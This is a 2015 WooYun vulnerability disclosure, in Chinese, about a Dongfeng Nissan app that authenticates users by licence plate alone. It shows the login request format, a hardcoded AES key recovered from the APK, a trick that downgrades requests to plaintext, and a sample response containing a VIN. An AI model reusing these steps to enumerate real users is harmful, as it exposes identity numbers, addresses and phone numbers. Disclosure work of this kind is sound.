当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133819

漏洞标题:东风日产某系统存在用户信息枚举及任意登入

相关厂商:东风日产乘用车公司

漏洞作者: 路人甲

提交时间:2015-08-13 11:45

修复时间:2015-09-28 09:12

公开时间:2015-09-28 09:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

东风日产某系统存在用户信息枚举及任意登入

详细说明:

发现app仅需要输入车号就可登入,这有问题吧

2015-08-13-10-07-42.png


随意测试下,发现确实可登入任意用户

2015-08-13-10-09-30.png


让我们挂上proxy来分析下封包

2015-08-13_10-10-44.png


把里面的json参数编码,可得到一个json字符串,其中LOGIN参数就是先前输入的车牌讯息,这里只要带入任意车牌,即可取得该用户的信息

{"data":{"body":{"parameters":{"appversion":"1.0.0.6","devicetype":"4","ipaddress":"XXXX::XX:XXXX:XX:XXX%p2p0",
"devicetoken":"004402343671479","LOGIN":"XXXX","TYPE":1,"appname":"DFNAPP"},
"functioncode":"20010001"},"lan":"zh","devicetoken":"004402343671479",
"isdefault":"1","user":"","servercode":"2001"},"protocolversion":"1.0",
"encrytype":"0"}


在返回数据里同样是url编码的json对象,将他解开可发现用户名、用户标识符、身份证号、联系电话、地址、引擎号码等用户信息

2015-08-13_10-24-40.png


用程序枚举下用户信息,证实攻击可行

2015-08-13_10-28-47.png


其实就是发送数据向后端web service取得用户信息,理所当然也可以仿照app来取得任意用户的[我的消息]信息,同样使用proxy先来取得封包格式,比较特别的是送出去信息有加密了,可看下图data的部份及encrytype:3 (先前取得用户信息是encrytype:0)

2015-08-13_10-31-43.png


没关系我们有apk,直接从反编译的程序代码中找到encrytype代表AES加密,与密钥为LANYOUAPLANYOUAP

2015-08-13_10-32-18.png


解出完整明文

2015-08-13_10-37-34.png


将encrytype设置为0即可用明文与后端服务器做沟通

2015-08-13_10-41-50.png


任意取得某位用户的[我的消息]信息

{
    "protocolversion":"1.0",
    "encrytype":"0",
    "data":{
        "error":"0000",
        "errormassage":"操作成功",
        "body":{
            "error":"20010000",
            "errormessage":"",
            "result":[
                {
                    "MESSAGE_ID":"127028499",
                    "VIN":"LGBP12E05CY146201",
                    "MSG_TYPE_CODE":"10",
                    "MSG_NAME":"专案提醒",
                    "MSG_PIC":"",
                    "MSG_NOTE":"冷车启动时变速箱有响声ATCU升级 预计截至时间:2016-04-30",
                    "MSG_BEGIN_DATE":"",
                    "MSG_END_DATE":"",
                    "DLR_CODE":"",
                    "BUSINESS_ID":"12419",
                    "REMARK":"",
                    "IS_ENABLE":"1",
                    "CREATOR":"SYSTEM",
                    "CREATED_DATE":"2014/10/17 3:43:27",
                    "MODIFIER":"SYSTEM",
                    "LAST_UPDATED_DATE":"2014/10/17 3:43:27",
                    "SDP_USER_ID":"88888",
                    "HAPPEN_TIME":"",
                    "ROADINFO":"",
                    "IS_READ":"1"
                },
                {
                    "MESSAGE_ID":"126917145",
                    "VIN":"LGBP12E05CY146201",
                    "MSG_TYPE_CODE":"10",
                    "MSG_NAME":"专案提醒",
                    "MSG_PIC":"",
                    "MSG_NOTE":"关于CVT低温加速不良(-20度)处置专案 预计截至时间:2016-04-30",
                    "MSG_BEGIN_DATE":"",
                    "MSG_END_DATE":"",
                    "DLR_CODE":"",
                    "BUSINESS_ID":"12383",
                    "REMARK":"",
                    "IS_ENABLE":"1",
                    "CREATOR":"SYSTEM",
                    "CREATED_DATE":"2014/10/15 1:30:46",
                    "MODIFIER":"SYSTEM",
                    "LAST_UPDATED_DATE":"2014/10/15 1:30:46",
                    "SDP_USER_ID":"88888",
                    "HAPPEN_TIME":"",
                    "ROADINFO":"",
                    "IS_READ":"1"
                }
            ]
        }
    }
}


漏洞证明:

用程序枚举下用户信息,证实攻击可行

2015-08-13_10-28-47.png


在返回数据里同样是url编码的json对象,将他解开可发现用户名、用户标识符、身份证号、联系电话、地址、引擎号码等用户信息

2015-08-13_10-24-40.png


修复方案:

建议增加口令,单一因子不安全

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-14 09:11

厂商回复:

感谢提醒!

最新状态:

暂无